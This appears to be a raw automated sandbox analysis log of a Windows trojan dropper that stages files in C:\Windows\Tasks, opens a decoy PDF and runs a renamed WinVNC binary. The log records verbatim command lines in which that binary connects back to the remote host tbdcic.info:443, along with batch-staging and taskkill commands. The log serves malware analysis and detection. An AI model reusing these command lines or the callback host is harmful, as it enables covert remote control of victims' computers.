Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C4C090	28_2_00007FF790C4C090
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C31880	28_2_00007FF790C31880

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Code function: String function: 004026B0 appears 38 times
Source: C:\Windows\Tasks\browser_sn.exe	Code function: String function: 00007FF790CE7C50 appears 60 times
Source: C:\Windows\Tasks\browser_sn.exe	Code function: String function: 00007FF790CE9500 appears 42 times
Source: C:\Windows\Tasks\browser_sn.exe	Code function: String function: 00007FF790C3AE30 appears 34 times
Source: C:\Windows\Tasks\browser_sn.exe	Code function: String function: 00007FF790C9A3B0 appears 38 times
Source: C:\Windows\Tasks\browser_sn.exe	Code function: String function: 00007FF790CE70B4 appears 56 times
Source: C:\Windows\Tasks\browser_sn.exe	Code function: String function: 00007FF790C33730 appears 730 times

Source: Xv6Ya.d8LhT.0.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: Xv6Ya.d8LhT.0.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: Xv6Ya.d8LhT.2.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: Xv6Ya.d8LhT.2.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: browser_sn.exe.8.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: browser_sn.exe.8.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate

Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinVNC.exe0 vs T8xrZb7nBL.exe
Source: T8xrZb7nBL.exe, 00000000.00000003.1289507685.00000000025A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamebrowser.exe( vs T8xrZb7nBL.exe
Source: T8xrZb7nBL.exe, 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebrowser.exe( vs T8xrZb7nBL.exe
Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.000000000096B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinVNC.exe0 vs T8xrZb7nBL.exe
Source: T8xrZb7nBL.exe, 00000000.00000003.1291956543.00000000027A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCONHOST.EXEj% vs T8xrZb7nBL.exe
Source: T8xrZb7nBL.exe	Binary or memory string: OriginalFilenamebrowser.exe( vs T8xrZb7nBL.exe

Source: T8xrZb7nBL.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: conhost.exe.8.dr

Binary string: \Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cppHost Signal Handler Threadonecore\windows\core\console\open\src\interactivity\base\hostsignalinputthread.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp

Source: classification engine

Classification label: mal84.troj.spyw.evad.winEXE@69/63@4/1

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

Code function: 0_2_00408DBF wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

0_2_00408DBF

Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	24_2_00007FF790C434B0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C43550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	24_2_00007FF790C43550
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C418A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	24_2_00007FF790C418A0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	28_2_00007FF790C434B0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C43550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	28_2_00007FF790C43550
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C418A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	28_2_00007FF790C418A0

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

Code function: 0_2_004011D1 GetDiskFreeSpaceExW,SendMessageW,

0_2_004011D1

Source: C:\Windows\Tasks\browser_sn.exe	Code function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,		24_2_00007FF790C42D00
Source: C:\Windows\Tasks\browser_sn.exe	Code function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,		28_2_00007FF790C42D00

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C99BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,

24_2_00007FF790C99BC0

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

Code function: 0_2_0040385E _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_0040385E

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

Code function: 0_2_00401DC9 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,

0_2_00401DC9

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\Downloads\Lom.pdf

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\Tasks\browser_sn.exe	Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

File created: C:\Users\user~1\AppData\Local\Temp\7ZipSfx.000

Jump to behavior

Source: T8xrZb7nBL.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "browser_sn.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "browser_sn.exe")

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: browser_sn.exe	String found in binary or memory: -startservice
Source: browser_sn.exe	String found in binary or memory: -install
Source: browser_sn.exe	String found in binary or memory: -stopservice
Source: browser_sn.exe	String found in binary or memory: -startservice
Source: browser_sn.exe	String found in binary or memory: -install
Source: browser_sn.exe	String found in binary or memory: -stopservice

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

File read: C:\Users\user\Desktop\T8xrZb7nBL.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\T8xrZb7nBL.exe "C:\Users\user\Desktop\T8xrZb7nBL.exe"
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1728,i,947990923128245266,18181737680692098631,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows\Tasks\3889122.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 600
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows\Tasks\3889122.cmd"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 600	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1728,i,947990923128245266,18181737680692098631,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: apphelp.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: winmm.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: userenv.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: sspicli.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: winsta.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: napinsp.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: wshbth.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: nlaapi.dll
